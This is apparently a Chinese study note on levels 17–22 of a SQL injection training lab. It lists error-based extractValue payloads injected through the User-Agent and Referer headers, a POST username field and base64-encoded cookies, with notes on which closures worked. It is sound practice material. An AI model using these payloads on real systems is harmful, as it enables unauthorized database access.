sqli靶场level17-level22

120 阅读1分钟

level17(不会)

  1.   抓包,查看正常请求和响应。

 

 

  1.   尝试是否存在注入

 

 

  1.   尝试POC

 

level18

  1.   抓包,查看正常请求和响应。

image.png

  1.   根据UA特性尝试POC:

(1)      采用'前后闭合的方式

POC: ' and extractValue(1,concat(0x7e,user(),0x73)) and '

image.png

(2)      采用补全参数的方式

POC: ',extractValue(1,concat(0x7e,user(),0x73)))#               //补全一个参数,failed

image.png

POC: ',1,extractValue(1,concat(0x7e,user(),0x73)))#              //补全两个参数,OK

image.png

 

image.png

level19

  1.   抓包,查看正常请求和响应。

image.png

  1.   测试refer是否存在漏洞:使用'测试是否周期性变化

image.png

  1.   尝试POC

POC: ' and extractValue(1,concat(0x7e,user(),0x7e)) and ' --+         //yes

image.png

POC: ',extractValue(1,concat(0x7e,user(),0x7e)))#              //yes         

image.png

 

level20

  1.   抓包,查看正常请求和响应。

  image.png

  1.   尝试是否存在注入

image.png

  1.   尝试POC

POC: uname=admin'+and+extractValue(1,concat(0x7e,user(),0x7e)) and '

POC: uname=admin'+and+extractValue(1,concat(0x7e,user(),0x7e))#

image.png

level21

  1.   抓包,查看正常请求和响应。

同level20

  1.   尝试是否存在注入

同level20

image.png

发现cookie这里进行了base64编码,解码之后为admin。因此我们的poc也需要编码。

  1.   尝试POC

POC:admin' and extractValue(1,concat(0x7e,user(),0x7e)) and '

image.png

level22

  1.   抓包,查看正常请求和响应。

image.png

  1.   尝试是否存在注入

同level21,cookie处仍然存在编码

image.png

 

  1.   尝试POC

POC: admin' and extractValue(1,concat(0x7e,user(),0x7e)) and '            //失败

  image.png

POC: admin" and extractValue(1,concat(0x7e,user(),0x7e)) and "              //ok

POC: admin" and extractValue(1,concat(0x7e,user(),0x7e))#                 //ok

image.png